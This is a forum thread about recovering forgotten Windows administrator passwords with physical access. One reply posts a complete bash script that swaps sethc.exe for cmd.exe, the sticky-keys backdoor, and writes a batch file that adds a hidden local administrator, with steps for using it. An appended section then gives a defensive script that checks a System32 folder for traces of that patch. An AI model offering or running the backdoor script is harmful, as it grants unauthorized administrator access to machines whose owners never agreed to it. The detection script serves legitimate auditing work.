Acronym
Posted September 17, 2018

Hey! I just ordered a Bash Bunny, and am eager to start playing around with it.

I work in the IT world, and a common complaint with new clients is they've forgotten their Windows Admin Passwords. Generally we would just go in there with the well known Windows exploit to get that going, however I'm wondering if there was a way to get the bunny to do that faster, and easier.

My question is, not knowing the admin password, and not being able to log in to the computer (or being able to log in as only a USER not an admin), is there a way to have the bunny pull the password (or even the hash)?

Dice
Posted September 17, 2018

If you can type it, you can have the bunny do it. However, as the local admin password is encrypted I would not know a way to extract that. Booting an (unencrypted) disk with any repair disk would reset it, not retrieve it. However, the bunny is unable to do this.

Bigbiz
Posted September 22, 2018

Also to extract the hash is not gonna work as the hash files are locked into the computer, even from an admin terminal. I'm working on a ducky script to extract the hash to crack offline but as you see problems, some research is due.

dennishedgehog
Posted November 2, 2018

Why not use the LAN Turtle and employ the snagging creds module?

NoExecute
Posted November 3, 2018

Or, just boot from a Kali Live system, mount the Windows drive.

------------sethcpatch.sh v2 start--------------
#! /bin/bash
# cmd.exe --> sethc.exe copy patch
# Target Windows XP - 10, Windows Server 2k, 2k3, 2k8, untested on Server 2016
# Version 0.2 - June 2018
# By kent j <kent@labet.dk>

HELP() {
    echo "Run with patchwin / unpatchwin"
}

PATCH_WIN () {
    echo "patching windows sethc function...."
    sleep 2
    mkdir patch
    cp sethc.exe patch/sethc.bak
    cp cmd.exe patch/cmd.bak
    rm sethc.exe
    cp cmd.exe sethc.exe
    echo "patching done ......"
    sleep 2
    echo "Writing windows bat file..."
    cd patch
    touch useradd.bat
    echo "net user /add USER PASS" >useradd.bat
    echo "net localgroup administratorer USER /add" >>useradd.bat
    cd ..
    sleep 2
    echo "useradd.bat written to c:\windows\system32\patch\useradd.bat"
    echo "Run with useradd.bat"
    sleep 2
}

UNPATCH_WIN() {
    echo "unpatch Windows sethc.exe"
    sleep 2
    rm sethc.exe
    rm cmd.exe
    cd patch
    cp sethc.bak ../sethc.exe
    cp cmd.bak ../cmd.exe
    cd ..
    rm -rf patch
    sleep 2
    echo "Cleanup ended !"
    echo "sethc.exe & cmd.exe back to normal..."
    echo "Script terminated... "
}

case $1 in
    help)
        HELP
        ;;
    patchwin)
        PATCH_WIN
        ;;
    unpatchwin)
        UNPATCH_WIN
        ;;
esac
exit 0
-----------------sethcpatch.sh v2 End------------------

Just add this to a custom Kali under /opt/tools/local/win (or wherever you like).
Makes your life so much easier when users are forgetting their passwords :D

For use, copy it to the local windrive and run it. When in Windows terminal, run the bat file. Log in, and enjoy admin privs :)

/Kent

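The script above leaves recognisable traces in System32: a sethc.exe that is a byte-for-byte copy of cmd.exe, and a patch directory holding sethc.bak, cmd.bak and useradd.bat. The following audit for those traces is an added example, not part of the thread or of Kent's script; the function name check_sethc_patch and the mount point in the usage comment are assumptions.

```shell
#!/bin/bash
# Added example: audit a System32 directory (e.g. on a mounted Windows
# volume) for traces of the sethcpatch.sh script quoted above.
# Prints one line per finding; returns 0 if clean, 1 if anything was
# found, 2 if the argument is not a directory.

check_sethc_patch() {
    local sys32="$1" findings=0 f

    if [ ! -d "$sys32" ]; then
        echo "error: $sys32 is not a directory" >&2
        return 2
    fi

    # 1. sethc.exe identical to cmd.exe: Sticky Keys would open a shell.
    if [ -f "$sys32/sethc.exe" ] && [ -f "$sys32/cmd.exe" ] &&
       cmp -s "$sys32/sethc.exe" "$sys32/cmd.exe"; then
        echo "FINDING: sethc.exe is identical to cmd.exe"
        findings=$((findings + 1))
    fi

    # 2. sethc.exe missing: the script was interrupted after its rm step.
    if [ ! -f "$sys32/sethc.exe" ]; then
        echo "FINDING: sethc.exe is missing"
        findings=$((findings + 1))
    fi

    # 3. Files the script writes into its patch/ subdirectory.
    for f in sethc.bak cmd.bak useradd.bat; do
        if [ -f "$sys32/patch/$f" ]; then
            echo "FINDING: leftover patch/$f"
            findings=$((findings + 1))
        fi
    done

    [ "$findings" -eq 0 ]
}

# Usage (mount point is an assumption):
#   ./check_sethc.sh /mnt/windows/Windows/System32
if [ "$#" -ge 1 ]; then
    check_sethc_patch "$1"
fi
```

A clean result only rules out this script's file-copy method; it says nothing about accounts that were created while the patch was in place, so review local administrators as well.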
This topic is now archived and is closed to further replies.